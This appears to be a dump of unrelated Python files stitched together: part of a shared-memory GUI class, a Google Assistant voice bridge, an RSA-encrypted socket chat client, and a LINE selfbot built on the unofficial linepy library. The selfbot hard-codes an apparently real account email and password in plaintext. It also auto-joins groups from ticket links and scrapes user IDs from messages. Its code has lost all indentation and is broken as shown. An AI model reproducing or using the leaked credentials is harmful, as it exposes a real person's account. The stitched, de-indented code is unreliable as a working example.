        image_name_str += '\0'*(MAX_NAME_LENGTH*MAX_NUM_POSTED_IMAGES - len(image_name_str))
        option_name_str = ''.join(option_names)
        option_name_str += '\0'*(MAX_NAME_LENGTH*MAX_NUM_OPTIONS - len(option_name_str))
        frame = _gui_struct.pack(len(self._image_accessors),
                                 len(self._option_accessors),
                                 image_name_str.encode('utf8'),
                                 option_name_str.encode('utf8'))
        # NOTE(review): np.fromstring is deprecated (np.frombuffer is the
        # modern equivalent); left unchanged here.
        self.write_frame(np.fromstring(frame, dtype=np.uint8), int(time.time() * 1000))
    def create_option(self, option_name, format_str):
        """Create (if absent) an option CMF with *format_str* as its struct
        value layout, publish the update, and start watching it."""
        if option_name not in self._option_accessors:
            with self._lock:
                name = _construct_gui_shm_name(self._module_name, option_name, True)
                writer = _OptionCreator(name, format_str)
                self._option_accessors[option_name] = writer
                self._update()
                t = threading.Thread(target=self._watch_option,
                                     args=(option_name, writer))
                t.start()
                self.threads.append(t)
    def create_image(self, image_name, image_buffer_size):
        """Create (if absent) an image CMF of *image_buffer_size* bytes,
        publish the update, and start watching it."""
        if image_name not in self._image_accessors:
            with self._lock:
                name = _construct_gui_shm_name(self._module_name, image_name, False)
                writer = Creator(name, image_buffer_size)
                self._image_accessors[image_name] = writer
                self._update()
                t = threading.Thread(target=self._watch_image,
                                     args=(image_name, writer))
                t.start()
                self.threads.append(t)
    def cleanup(self):
        """Unblock and join all watcher threads, then clean up child CMFs
        and the module framework itself.

        NOTE(review): overrides Accessor.cleanup(kill=True) with a
        narrower signature — confirm no caller passes the kill argument.
        """
        self.unblock()
        for thread in self.threads:
            thread.join()
        for CMF in self._get_all_CMFs():
            CMF.cleanup()
        super().cleanup()
    def set_image_ordering(self, key_function):
        """Set the sort key for published image names and republish."""
        self._image_ordering = _safe_key_wrapper(key_function)
        self._update()
    def set_option_ordering(self, key_function):
        """Set the sort key for published option names and republish."""
        self._option_ordering = _safe_key_wrapper(key_function)
        self._update()
|
google_voice.py | #!/usr/bin/env python
# google voice client, start listen voice input by google assistant and publish text to ros node
# Copyright (C) 2018 Elemtary Robotics Inc.
from __future__ import print_function
import argparse
import os.path
import json
import google.auth.transport.requests
import google.oauth2.credentials
from google.assistant.library import Assistant
from google.assistant.library.event import EventType
from google.assistant.library.file_helpers import existing_file
from multiprocessing import Process, Queue
import os
import subprocess
from atom import Element
from atom.messages import Response
class Sounds(object):
    """
    Registry of named sound files, played back via the `play` CLI tool.
    """
    def __init__(self):
        # name -> path of a playable audio file
        self.sounds = {}

    def load_sound(self, name, filename):
        """Register *filename* under *name*."""
        self.sounds[name] = filename

    def play_sound(self, name):
        """Play a registered sound; return True on success, False if the
        name is unknown."""
        if name not in self.sounds:
            print("Sound {} not supported!".format(name))
            return False
        subprocess.call(["play", self.sounds[name]])
        print("Played sound {}".format(name))
        return True
class SoundElement(object):
    """
    Bridges the atom command interface to the sound playback queue.
    """
    def __init__(self, queue):
        # Queue consumed by sound_playback_thread.
        self.q = queue

    def command_cb(self, data):
        """Queue the ascii-decoded sound name and acknowledge."""
        name = data.decode('ascii')
        self.q.put(name)
        return Response(data="Success")
def sound_element_thread(sound_queue):
    """
    Registers all of the sound playback commands for this element and
    handles them forever (command_loop blocks).
    """
    element = Element("sound")
    # Route the play_sound command into the shared queue.
    handler = SoundElement(sound_queue)
    element.command_add("play_sound", handler.command_cb)
    element.command_loop()
def sound_playback_thread(sound_queue):
    """
    Load the known sounds, then block on the queue and play each requested
    sound forever.
    """
    player = Sounds()
    clips = {
        "success": "/usr/local/share/sounds/success.wav",
        "fail": "/usr/local/share/sounds/fail.wav",
        "on_start": "/usr/local/share/sounds/on_conversation_start.wav",
    }
    for name, path in clips.items():
        player.load_sound(name, path)
    # Loop, reading from the queue and playing sounds
    while True:
        player.play_sound(sound_queue.get())
def process_event(event, assistant, element, sound_queue):
    """
    Handle one Assistant event: play the start cue, publish recognized
    speech on the element's 'string' stream, and log the event.
    """
    if event.type == EventType.ON_CONVERSATION_TURN_STARTED:
        # Audible cue that the assistant started listening.
        sound_queue.put("on_start")
    if event.type == EventType.ON_RECOGNIZING_SPEECH_FINISHED:
        recognized = event.args["text"]
        element.entry_write("string", {"data" : recognized})
        # We only wanted the transcription — don't let the assistant reply.
        assistant.stop_conversation()
    # Always print the event
    print(event)
def main():
    """Wire Google Assistant voice input to the atom 'voice' element.

    Parses CLI args, loads OAuth2 credentials, starts the sound playback
    and sound-element helper processes, then pumps Assistant events
    forever (never returns normally).
    """
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument('--credentials', type=existing_file,
                        metavar='OAUTH2_CREDENTIALS_FILE',
                        default=os.path.join(
                            os.path.expanduser('~/.config'),
                            'google-oauthlib-tool',
                            'credentials.json'
                        ),
                        help='Path to store and read OAuth2 credentials')
    parser.add_argument('--device_model_id', type=str,
                        metavar='DEVICE_MODEL_ID', required=True,
                        help='The device model ID registered with Google')
    parser.add_argument(
        '-v',
        '--version',
        action='version',
        version='%(prog)s ' +
        Assistant.__version_str__())
    args = parser.parse_args()
    with open(args.credentials, 'r') as f:
        credentials = google.oauth2.credentials.Credentials(token=None,
                                                            **json.load(f))
    # Set up the sound thread
    sound_queue = Queue()
    sound_thread = Process(target=sound_playback_thread, args=(sound_queue,))
    sound_thread.start()
    # Set up the process that will play sounds for other processes. This
    # is needed until we get a shared PulseAudio system up and running
    # s.t. all elements can play their own sounds
    sound_element = Process(target=sound_element_thread, args=(sound_queue,))
    sound_element.start()
    with Assistant(credentials, args.device_model_id) as assistant:
        # Create our element
        element = Element("voice")
        # Start the assistant
        events = assistant.start()
        # NOTE(review): the helper processes are never joined/terminated;
        # they die with the parent.
        for event in events:
            process_event(event, assistant, element, sound_queue)
# Standard script entry point.
if __name__ == '__main__':
    main()
|
client.py | # Created by MysteryBlokHed on 21/02/2020.
import socket
from datetime import datetime
from math import ceil
from threading import Thread
from time import sleep
from .encryption import *
from .exceptions import *
from .status import *
HEADERSIZE = 16
class Client(object):
    """
    `port: int` - The port that the server hosts Encwork on.

    Encwork client: exchanges RSA public keys with the server, then
    receives RSA-encrypted, length-prefixed message parts on a background
    thread and reports progress via Status objects.
    """
    def __init__(self, port: int=2006):
        # Peer's RSA public key (bytes); populated after key exchange.
        self._peer_public_key = None
        # Server hostname/IP; set by start().
        self._target = None
        # Pending Status objects, drained by statuses().
        self._latest_statuses = []
        self.port = port
        # Generate private key
        self._latest_statuses.append(Status(1))
        self._private_key = gen_private_key()
        self._latest_statuses.append(Status(2))
        # Set up socket
        self._latest_statuses.append(Status(3, "client"))
        self._s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._latest_statuses.append(Status(4, "client"))
    def headerify(self, message: bytes):
        """Add the 16-byte header (specifies msg length) to the message"""
        return bytes(f"{len(message):<{HEADERSIZE}}", "utf-8") + message
    def statuses(self):
        """Streams statuses, such as messages and encryption status.

        Infinite generator yielding queued Status objects.
        NOTE(review): busy-waits without sleeping, and the list reset
        races with the connection thread's appends — a status appended
        between the iteration and the reset can be dropped.
        """
        while True:
            if len(self._latest_statuses) > 0:
                for status in self._latest_statuses:
                    yield status
                self._latest_statuses = []
    def _connection(self):
        """Internal function to connect to server and receive messages."""
        # Outer loop retries the connect/key-exchange/receive cycle on any
        # failure, sleeping 5s between attempts (see outermost except).
        while True:
            try:
                # Try to connect
                self._latest_statuses.append(Status(12, self._target))
                self._s.connect((self._target, self.port))
                self._latest_statuses.append(Status(13, self._target))
                # Send public key
                self._latest_statuses.append(Status(10, self._target))
                self._s.send(self.headerify(get_public_key_text(get_public_key(self._private_key))))
                self._latest_statuses.append(Status(15, self._target))
                # Receive public key
                self._latest_statuses.append(Status(18, self._target))
                try:
                    full_msg = b""
                    new_msg = True
                    while True:
                        # NOTE(review): assumes the first recv(16) returns
                        # the whole 16-byte header — TCP does not guarantee
                        # this for a single recv call.
                        msg = self._s.recv(16)
                        if new_msg:
                            msg_len = int(msg[:HEADERSIZE])
                            new_msg = False
                        full_msg += msg
                        if(len(full_msg) - HEADERSIZE == msg_len):
                            # Save the public key
                            self._peer_public_key = full_msg[HEADERSIZE:]
                            self._latest_statuses.append(Status(11, self._target))
                            cont = True
                            break
                except Exception as e:
                    self._latest_statuses.append(Status(19, self._target))
                    cont = False
                # Message receive loop
                while cont:
                    full_msg = b""
                    try:
                        new_msg = True
                        while True:
                            msg = self._s.recv(16)
                            if new_msg:
                                msg_len = int(msg[:HEADERSIZE])
                                new_msg = False
                            full_msg += msg
                            if(len(full_msg) - HEADERSIZE == msg_len):
                                self._latest_statuses.append(Status(7, self._target))
                                # Decrypt length and convert to int
                                # (the first frame of a message carries the
                                # number of encrypted parts that follow)
                                full_msg_len = int(decrypt(full_msg[HEADERSIZE:], self._private_key))
                                actual_full_message = []
                                # Get all parts of message
                                for i in range(full_msg_len):
                                    full_msg = b""
                                    try:
                                        new_msg = True
                                        while True:
                                            msg = self._s.recv(16)
                                            if new_msg:
                                                msg_len = int(msg[:HEADERSIZE])
                                                new_msg = False
                                            full_msg += msg
                                            if(len(full_msg) - HEADERSIZE == msg_len):
                                                actual_full_message.append(full_msg[HEADERSIZE:])
                                                # ExitTryExcept acts as a
                                                # labelled break out of the
                                                # inner recv loop.
                                                raise ExitTryExcept
                                    except ExitTryExcept:
                                        pass
                                    except Exception as e:
                                        self._latest_statuses.append(Status(21, self._target))
                                        cont = False
                                # Assemble message
                                full_message_dec = b""
                                for i in actual_full_message:
                                    full_message_dec += decrypt(i, self._private_key)
                                if self._utf8:
                                    self._latest_statuses.append(Status(8, (full_message_dec.decode("utf-8"), self._target)))
                                else:
                                    self._latest_statuses.append(Status(8, (full_message_dec, self._target)))
                                raise ExitTryExcept
                    except ExitTryExcept:
                        pass
            except:
                # Failed connection
                self._latest_statuses.append(Status(14, self._target))
                sleep(5)
    def start(self, target: str, utf8: bool=True):
        """
        Start the Encwork client.
        `target: str` The server to connect to.
        `utf8: bool` Whether or not to send/receive encoded as UTF-8. Must be `False` for receiving/sending files such as executables or media.
        """
        self._utf8 = utf8
        self._target = target
        Thread(target=self._connection).start()
    def send_msg(self, message: str):
        """
        Send a message to the server.
        `message: str` The message to send. Should be str if utf8=True, and bytes if utf8=False.
        """
        # See if there is a target
        if self._target is None:
            raise NoTargetError("No target is available to send messages to.")
        # See if a public key has been received
        if self._peer_public_key is None:
            raise NoEncryptionKeyError("There is no public key to encrypt with.")
        # Tell the peer many messages that come in are a part of this one
        # (Done due to the size limit of RSA keys)
        # 446 is presumably the max plaintext per RSA block for the key
        # size/padding used in .encryption — TODO confirm.
        split_size = ceil(len(message)/446)
        split_size_enc = self.headerify(encrypt(bytes(str(split_size), "utf-8"), self._peer_public_key))
        self._s.send(split_size_enc)
        # Send the message in as many parts as needed
        self._latest_statuses.append(Status(16, self._target))
        for i in range(split_size):
            if self._utf8:
                self._s.send(self.headerify(encrypt(bytes(message[446*i:446*(i+1)], "utf-8"), self._peer_public_key)))
            else:
                self._s.send(self.headerify(encrypt(message[446*i:446*(i+1)], self._peer_public_key)))
        self._latest_statuses.append(Status(17, self._target))
bot.py | # -*- coding: utf-8 -*-
from linepy import *
####################################################
from liff.ttypes import *
####################################################
from akad.ttypes import *
####################################################
from datetime import datetime, timedelta
####################################################
from bs4 import BeautifulSoup
####################################################
from humanfriendly import format_timespan, format_size, format_number, format_length
####################################################
from threading import Thread
####################################################
from io import StringIO
####################################################
import multiprocessing
####################################################
from urllib.parse import urlencode
####################################################
from random import randint
####################################################
from time import sleep
####################################################
import matplotlib.pyplot as plt
####################################################
import pandas as pd
####################################################
from gtts import gTTS
####################################################
from googletrans import Translator
####################################################
from Naked.toolshed.shell import execute_js
####################################################
import platform, shutil, socket, time, random, sys, json, codecs, threading, threadpool, glob, re, string, os, requests, subprocess, six, ast, urllib, urllib.parse, timeit, atexit, youtube_dl, pafy, pytz, asyncio, humanize, traceback, ssl, psutil, uvloop
####################################################
# Shared HTTP session for outbound requests.
_session = requests.session()
# Python 2/3 compatibility shim for urllib2.
try:
    import urllib.request as urllib2
except ImportError:
    import urllib2
####################################################
os.system('clear')
####################################################
# SECURITY(review): account credentials are hard-coded in source — move
# them to environment variables or a config file, and rotate this password.
cl = LINE("svrlego115@gmail.com","rahmagila123")
####################################################
# mid (user id) of the logged-in account.
clMID = cl.profile.mid
# Long-poll operation fetcher for the LINE client.
oepoll = OEPoll(cl)
# Mutable bot state/config.
# NOTE(review): the name `set` shadows the builtin set() type in this module.
set = {
    "owner": ["u9be8862cb884bde356d0e41fb6850514"],  # privileged account mids
    # Custom command aliases: internal key -> chat trigger strings.
    "ccmd": {
        "liffurl": [".liffurl"],
        "time": [".time"],
        "date": [".date"],
        "lasttag": [".lasttag"],
        "logout": [".logout"],
        "oplist": [".oplist"],
        "restart": [".restart"],
        "status": [".status"],
        "findoa": [".findoa"],
        "ttag": [".ttag"],
        "stag": [".stag"],
        "ltag": [".ltag"]
    },
    # Details of the last message that mentioned this account
    # (msgid/mid/to/time, filled in by the op handler).
    "lastt": {},
    "aprol": 1
}
# Feature toggles consumed by lineBot().
set2 = {
    "jg": True,        # auto-accept group invitations addressed to us
    "lj": True,        # auto-join groups via /ti/g/ ticket links in messages
    "lg": False,
    "lr": False,       # auto-leave rooms we're invited into
    "apro": False,
    "protect": False,
    "getmid": True,    # echo a contact card for any valid mid seen in text
    "flwrm": False,
    "debugall": False
}
# Debug identifiers — usage not visible in this excerpt.
test = {
    "debug": ["c846fec69c4f52feb32f00cf8970a95bc"],
    "debugbd": "rbd07ffb48c082bab980cfd02be9e3837",
    "2": True
}
# Ensure the logged-in account is always an owner.
if clMID not in set["owner"]:
    set["owner"].append(clMID)
print("Login Success")
def ismid(mid):
    """Return True if *mid* resolves to a LINE contact, else False.

    Used to validate candidate mids scraped from message text.
    """
    try:
        cl.getContact(mid)
        return True
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # aren't swallowed; any API failure still means "not a valid mid".
        return False
def allowLiff(ChannelId='1655527991'):
    """Grant the given LIFF channel the P/CM permissions for this account."""
    endpoint = 'https://access.line.me/dialog/api/permissions'
    payload = {
        'on': ['P', 'CM'],
        'off': [],
    }
    headers = {
        'X-Line-Access': cl.authToken,
        'X-Line-Application': cl.server.APP_NAME,
        'X-Line-ChannelId': ChannelId,
        'Content-Type': 'application/json',
    }
    requests.post(endpoint, json=payload, headers=headers)
def sendTemplate(to, data):
    """Send flex/template message *data* to chat *to* via the LIFF v3
    share API, using a freshly issued LIFF view token."""
    chat_ctx = LiffChatContext(to)
    liff_ctx = LiffContext(chat=chat_ctx)
    view = LiffViewRequest('1655527991-3Lbo8OkW', liff_ctx)
    token = cl.liff.issueLiffView(view)
    headers = {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer %s' % token.accessToken,
    }
    payload = {"messages": [data]}
    requests.post('https://api.line.me/message/v3/share',
                  headers=headers, data=json.dumps(payload))
def lineBot(op):
try:
if op.type == 0:
return
if op.type in [5]:
cl.findAndAddContactsByMid(op.param1)
elif op.type in [13, 124]:
if clMID in op.param3:
if set2["jg"] == True:
cl.acceptGroupInvitation(op.param1)
elif op.type in [22]:
if clMID in op.param3:
room = cl.getRoom(op.param1)
if set2["lr"]:
cl.leaveRoom(op.param1)
elif op.type in [25, 26]:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != cl.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if text is None:
cmd = ""
else:
cmd = text.lower()
if set2["getmid"] == True:
if 'u' in cmd:
mids_re = re.compile("u[a-z0-9]{32}")
mids = mids_re.findall(cmd)
targets = []
for l in mids:
if l not in targets:
if ismid(l):
targets.append(l)
for target in targets:
cl.sendContact(to, target)
if 'MENTION' in msg.contentMetadata.keys() != None:
mentionees = ast.literal_eval(
msg.contentMetadata['MENTION'])['MENTIONEES']
for mention in mentionees:
if clMID in mention["M"]:
set["lastt"]["msgid"] = msg_id
set["lastt"]["mid"] = sender
set["lastt"]["to"] = to
set["lastt"]["time"] = datetime.now(tz=pytz.timezone(
"Asia/Jakarta")).strftime('%Y/%m/%d %H:%M:%S')
if set2["lj"] == True:
if "/ti/g/" in text:
link_re = re.compile(
'(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
try:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(
group.id, ticket_id)
except Exception as e:
if str(e.reason) == "request blocked":
cl.relatedMessage(to, "Current account regulation", msg_id)
elif "Ticket not found" in str(e.reason):
cl.relatedMessage(to, "This URL has been invalidated", msg_id)
elif "Prevented join by group ticket" in str(e.reason):
cl.relatedMessage(to, "The group does not open the URL to join", msg_id)
else:
cl.relatedMessage(to, "Income\n"+str(e), msg_id)
time.sleep(0.5)
if msg.contentType == 6:
timeNow = datetime.now(tz=pytz.timezone("Asia/Jakarta")).strftime('%Y/%m/%d %H:%M:%S')
b = msg.contentMetadata['GC_EVT_TYPE']
c = msg.contentMetadata["GC_MEDIA_TYPE"]
if c == 'AUDIO' and b == "S":
arg = "Start call"
arg += "\nTypes of: voice"
arg += "\nInitiator: @!"
arg += f"\nStart time: {timeNow}"
if c == 'VIDEO' and b == "S":
arg = "Start call"
arg += "\nTypes of: Video"
arg += "\nInitiator: @!"
arg += f"\nStart time: {timeNow}"
if c == 'LIVE' and b == "S":
arg = "Start call"
arg += "\nTypes of: LIVE"
arg += "\nInitiator: @!"
arg += f"\nStart time: {timeNow}"
else:
mills = int(msg.contentMetadata["DURATION"])
seconds = (mills / 1000) % 60
if c == "AUDIO" and b == "E":
arg = "End talk"
arg += "\nTypes of: voice"
arg += "\nInitiator: @!"
arg += f"\nEnd Time: {timeNow}"
arg += f"\nduration: {seconds} second"
if c == "VIDEO" and b == "E":
arg = "End talk"
arg += "\nTypes of: Video"
arg += "\nInitiator: @!"
arg += f"\nEnd Time: {timeNow}"
arg += f"\nduration: {seconds} second"
if c == "LIVE" and b == "E":
arg = "End talk"
arg += "\nTypes of: LIVE"
arg += "\nInitiator: @!"
arg += f"\nEnd Time: {timeNow}"
arg += f"\nduration: {seconds} second"
if sender in set["owner"]:
if cmd in ['help', 'allcmd', 'cmds', '幫助', '指令表', '指令']:
ret_ = "[General instruction]"
for a in set['ccmd']:
ret_ += "\n{} (key: {})".format(set['ccmd'][a], a)
ret_ += "\n\n[Other instructions]\n[Retrieve message]\nun:number\n[Permission adjustment]\nop:(@/mid)s\n[Switch function method]\nset:function name\n[Customary command method]\n+)ccmd:key:cmd\n-)dcmd:cmd"
cl.relatedMessage(to, ret_, msg_id)
elif cmd == 'test1':
uda = cl.getContact(sender)
if uda.pictureStatus is None:
uda0 = "not"
uda1 = "https://upload.cc/i1/2021/02/11/b0PkA1.png"
else:
uda0 = "Already"
uda1 = "https://obs.line-scdn.net/" + uda.pictureStatus
if uda.videoProfile is None:
uda2 = "not"
else:
uda2 = "Already"
if uda.musicProfile is None:
uda3 = "not"
else:
uda3 = "Already"
if uda.createdTime == 0:
uda4 = "not"
uda5 = "No friends have already added"
else:
uda4 = "Already"
uda5 = time.strftime(
"%Y/%m/%d %H:%M:%S", time.localtime(int(uda.createdTime) / 1000))
if uda.favoriteTime == 0:
uda6 = "not"
uda7 = "Have not joined"
else:
uda6 = "Already"
uda7 = time.strftime(
"%Y/%m/%d %H:%M:%S", time.localtime(int(uda.favoriteTime) / 1000))
if sender in set["owner"]:
uda8 = "Have"
uda9 = "Not"
else:
uda8 = "No"
uda9 = "Yes"
gidsl = []
for id in cl.getGroupIdsJoined():
if sender in [contact.mid for contact in cl.getGroup(id).members]:
gidsl.append(id)
uda10 = str(len(gidsl))
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {
"type": "carousel",
"contents": [
{
"type": "bubble",
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "image",
"url": "https://i.imgur.com/60dAA9r.jpg",
"size": "full",
"aspectMode": "cover",
"aspectRatio": "3:5",
"gravity": "top"
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "image",
"url": "{}".format(uda1),
"size": "full",
"aspectMode": "cover"
}
],
"width": "100px",
"height": "100px",
"cornerRadius": "100px"
}
],
"width": "100%",
"justifyContent": "center"
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "separator",
"margin": "lg",
"color": "#2894FF"
},
{
"type": "text",
"text": "User information-Basic",
"size": "xl",
"color": "#ffffff",
"weight": "bold",
"align": "center",
"margin": "md"
},
{
"type": "separator",
"margin": "sm",
"color": "#2894FF"
}
]
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "name",
"weight": "bold"
},
{
"type": "text",
"text": " {}".format(uda.displayName),
"wrap": True
}
]
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "name",
"weight": "bold"
},
{
"type": "text",
"text": " {}".format(uda.displayNameOverridden),
"wrap": True
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Signature number",
"weight": "bold"
},
{
"type": "text",
"text": "{}".format(str(len(uda.statusMessage))),
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Static head sticker",
"weight": "bold"
},
{
"type": "text",
"text": "{} Mount".format(uda0),
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Dynamic head stickers",
"weight": "bold"
},
{
"type": "text",
"text": "{} Mount".format(uda2),
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Background music state",
"weight": "bold"
},
{
"type": "text",
"text": "{} Mount".format(uda3),
"align": "end"
}
]
}
],
"margin": "lg"
}
],
"position": "absolute",
"offsetBottom": "0px",
"offsetStart": "0px",
"offsetEnd": "0px",
"backgroundColor": "#BEBEBEaa",
"paddingAll": "20px",
"paddingTop": "18px",
"offsetTop": "0px"
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "filler"
},
{
"type": "box",
"layout": "baseline",
"contents": [
{
"type": "filler"
},
{
"type": "icon",
"url": "https://i.ibb.co/0Jc95vm/3032276.png"
},
{
"type": "text",
"text": "Friend directly",
"color": "#FF0000",
"flex": 0,
"offsetTop": "-2px",
"weight": "bold"
},
{
"type": "filler"
}
],
"spacing": "sm"
},
{
"type": "filler"
}
],
"borderWidth": "1px",
"cornerRadius": "4px",
"spacing": "sm",
"borderColor": "#2894FF",
"margin": "xxl",
"height": "40px",
"backgroundColor": "#9D9D9Daa",
"action": {
"type": "uri",
"uri": "line://nv/profilePopup/mid={}".format(sender)
}
}
],
"position": "absolute",
"offsetBottom": "0px",
"paddingAll": "20px",
"offsetStart": "0px",
"offsetEnd": "0px"
}
],
"paddingAll": "0px"
}
},
{
"type": "bubble",
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "image",
"url": "https://i.imgur.com/oscMAJd.jpg",
"size": "full",
"aspectMode": "cover",
"aspectRatio": "3:5",
"gravity": "top"
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "separator",
"margin": "lg",
"color": "#2894FF"
},
{
"type": "text",
"text": "User information-Advancement",
"size": "xl",
"color": "#ffffff",
"weight": "bold",
"align": "center",
"margin": "md"
},
{
"type": "separator",
"margin": "sm",
"color": "#2894FF"
}
]
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Friend status",
"weight": "bold"
},
{
"type": "text",
"text": "{} Join".format(uda4),
"align": "end"
}
]
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "Join your friends",
"weight": "bold"
},
{
"type": "text",
"text": "{}".format(uda5)
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Favorite state",
"weight": "bold"
},
{
"type": "text",
"text": "{} Join".format(uda6),
"align": "end"
}
]
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "Join the favorite time",
"weight": "bold"
},
{
"type": "text",
"text": "{}".format(uda7)
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Authority status",
"weight": "bold"
},
{
"type": "text",
"text": "{} Authority".format(uda8),
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Black single status",
"weight": "bold"
},
{
"type": "text",
"text": "{} Black single".format(uda9),
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Common group quantity",
"weight": "bold"
},
{
"type": "text",
"text": "{}".format(uda10),
"align": "end"
}
]
}
],
"margin": "lg"
}
],
"position": "absolute",
"offsetBottom": "0px",
"offsetStart": "0px",
"offsetEnd": "0px",
"backgroundColor": "#BEBEBEaa",
"paddingAll": "20px",
"paddingTop": "18px",
"offsetTop": "0px"
}
],
"paddingAll": "0px"
}
}
]
}
}
sendTemplate(to, dat)
elif cmd == 'test2':
if test["2"] == True:
urii = "https://scdn.line-apps.com/n/channel_devcenter/img/flexsnapshot/clip/clip11.jpg"
urit = "line://app/1655527991-3Lbo8OkW?type=text&text=I want to close"
else:
urii = "https://scdn.line-apps.com/n/channel_devcenter/img/flexsnapshot/clip/clip10.jpg"
urit = "line://app/1655527991-3Lbo8OkW?type=text&text=I want to open"
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "Group intelligence",
"weight": "bold",
"size": "xl"
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "BAO?",
"gravity": "center"
},
{
"type": "image",
"url": urii,
"action": {
"type": "uri",
"uri": urit
}
}
]
}
]
}
}
}
sendTemplate(to, dat)
elif cmd == 'I want to open':
test["2"] = True
cl.relatedMessage(to, "ok\nTrue", msg_id)
elif cmd == 'I want to close':
test["2"] = False
cl.relatedMessage(to, "ok\nFalse", msg_id)
elif cmd == 'test3':
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "Payment notice",
"weight": "bold",
"color": "#1DB446",
"size": "sm"
},
{
"type": "text",
"text": "Payment",
"weight": "bold",
"size": "xxl",
"margin": "md"
},
{
"type": "separator",
"margin": "xxl"
},
{
"type": "box",
"layout": "vertical",
"margin": "xxl",
"spacing": "sm",
"contents": [
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Permanent semi-scale",
"size": "sm",
"color": "#555555",
"flex": 0
},
{
"type": "text",
"text": "x 1",
"size": "sm",
"color": "#111111",
"align": "end"
},
{
"type": "text",
"text": "$0",
"size": "sm",
"color": "#111111",
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"margin": "xxl",
"contents": [
{
"type": "text",
"text": "Quantity",
"size": "sm",
"color": "#555555"
},
{
"type": "text",
"text": "1",
"size": "sm",
"color": "#111111",
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "total",
"size": "sm",
"color": "#555555"
},
{
"type": "text",
"text": "$0",
"size": "sm",
"color": "#111111",
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "payment method:cash",
"size": "sm",
"color": "#555555"
},
{
"type": "text",
"text": "$0",
"size": "sm",
"color": "#111111",
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Zero",
"size": "sm",
"color": "#555555"
},
{
"type": "text",
"text": "$0",
"size": "sm",
"color": "#111111",
"align": "end"
}
]
}
]
},
{
"type": "separator",
"margin": "xxl"
},
{
"type": "box",
"layout": "horizontal",
"margin": "md",
"contents": [
{
"type": "text",
"text": "Order number",
"size": "xs",
"color": "#aaaaaa",
"flex": 0
},
{
"type": "text",
"text": "#0000000000",
"color": "#aaaaaa",
"size": "xs",
"align": "end"
}
]
}
]
},
"styles": {
"footer": {
"separator": True
}
}
}
}
sendTemplate(to, dat)
elif cmd == 'test4':
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://scdn.line-apps.com/n/channel_devcenter/img/fx/01_1_cafe.png",
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "http://linecorp.com/"
}
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "Brown Cafe",
"weight": "bold",
"size": "xl"
},
{
"type": "box",
"layout": "baseline",
"margin": "md",
"contents": [
{
"type": "icon",
"size": "sm",
"url": "https://scdn.line-apps.com/n/channel_devcenter/img/fx/review_gold_star_28.png"
},
{
"type": "icon",
"size": "sm",
"url": "https://scdn.line-apps.com/n/channel_devcenter/img/fx/review_gold_star_28.png"
},
{
"type": "icon",
"size": "sm",
"url": "https://scdn.line-apps.com/n/channel_devcenter/img/fx/review_gold_star_28.png"
},
{
"type": "icon",
"size": "sm",
"url": "https://scdn.line-apps.com/n/channel_devcenter/img/fx/review_gold_star_28.png"
},
{
"type": "icon",
"size": "sm",
"url": "https://scdn.line-apps.com/n/channel_devcenter/img/fx/review_gray_star_28.png"
},
{
"type": "text",
